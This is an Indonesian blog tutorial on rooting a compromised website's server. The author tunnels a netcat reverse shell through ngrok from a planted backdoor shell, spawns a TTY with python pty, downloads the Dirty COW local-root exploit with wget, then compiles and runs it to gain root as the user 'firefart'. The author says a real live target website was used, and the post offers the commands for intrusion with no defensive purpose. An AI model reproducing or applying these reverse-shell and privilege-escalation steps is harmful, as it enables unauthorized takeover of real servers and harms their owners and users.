Header Ads

Tutorial Rooting Server Dengan Ngrok

Tutorial Backconnect Dan Rooting Server With Ngrok - Oke kali ini saya akan membagi sedikit info dan pengalaman bagaimana caranya root server website dengan ngrok with backdoor shell. Sebelum melakukan root kita harus 
menyiapkan alat alat dibawah ini terlebih dahulu dan pastikan website kernel 2016 / 2015 / kebawahnya, Exaple :

Linux BKPSDM-KRW 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64

 jadi jika kernel 2017 belum bisa untuk di root saat ini dikarenakan localroot exploit nya masih tidak jelas

Sebelumnya Saya mengucapkan terimakasih kepada Sihol Randovlskyaka PenggilaCroot07 aka yang telah memberikan live target website untuk pembuatan tutorial rooting server ini ;v

Oke langsung saja
Bahan-bahan :

1) Netcat : [ Here ]
2) Ngrok : [ Here ]
3) Localroot dirty : [ Here ]
4) Shell Spawning : python -c 'import pty; pty.spawn("/bin/sh")'
5) Kernel 2016 / 2015 / 2014 / Kebawah.
6) Kopi + Rokok Biar gak panik ;v
7) Jangan lupa pacar biar joss ;v

Oke langsung saja Pertama buka ngrok , ketikan ngrok.exe tcp 666 , 666 bebas mau diisi dengan angka berapa sesuai selera ;v



lanjut jika sudah maka akan direct ke connection ngrok nya



nah jika sudah connect kita buka Netcat nya , masuk cmd , ketik nc -lnvp 666 , 666 itu angka tcp yg kita setting di ngrok tadi , dan jika ada tulisan listening on [any] 666..... tunggu jangan di close



Lanjutkan pergi ke shell kita lakukan backconnect terlebih dahulu , isikan kolom Server dan Port :
Server = 0.tcp.ngrok.io
Port    = 17781
Notes : Data diatas diambil dari ngrok di bagian tulisan bawah :
Forwarding                    tcp://0.tcp.ngrok.io:17781 -> localhost:666

Lalu Connect kan



jika berhasil maka tampilan nya akan jadi seperti ini :



Yaps selanjut nya kita copy shell spawningnya : 
python -c 'import pty; pty.spawn("/bin/sh")'
jika berhasil kecopy hasilnya akan muncul lagi dibawah setelah kita enter perhatikan gambar , jika masih tidak muncul lakukan spawwing ulang sampai muncul .



Selanjutnya kita copy dirty.c ke website target kita , ketik : wget --no-check-certificate(url file dirty.c) lalu tekan enter dan tunggu hingga selesai , jika sukses 200 OK maka tampilan nya seperti dibawah :



Selanjutnya kita cek apakah file dirty.c kita sudah terupload atau belum, caranya kita ketik : ls *.c ,jika sudah terupload akan ada file dirty.c seperti gambar berikut :



Jika sudah selanjutnya ketikkan perintah : gcc -pthread dirty.c -o dirty -lcrypt .jika sukses akan seperti ini :



Lanjut kita berikan akses dengan ketikkan : chmod +x dirty



Selanjutnya kita jalankan file dirtynya, dengan ketik : ./dirty , lalu isikan password sesuka kalian dan Enter



Tunggu beberapa menit tergantung server nya jika server jelek ya cepet ;v kalo server bagus lumayan lama ;v 
Jika berhasil maka akan seperti ini : 




Setelah itu tekan CTRL+C lalu lakukan backconnect kembali dan jangan lupa pasang shell spawning lagi dan hasil nya seperti ini :



Jika Sudah melakukan Backconnect ulang langsung ketikan su firefart , dan masukan password kalian tadi
Jika sudah selanjutnya ketikan id
Jika Muncul "uid=0(firefart) gid=0(root) groups=0(root)berarti kalian sudah berhasil melakukan rooting server ;)




Website has been Rooted ;)
Semoga tutorial ini bermanfaat ;)
Happy Hacking

(Zaenal/Kaizen)

1 comment: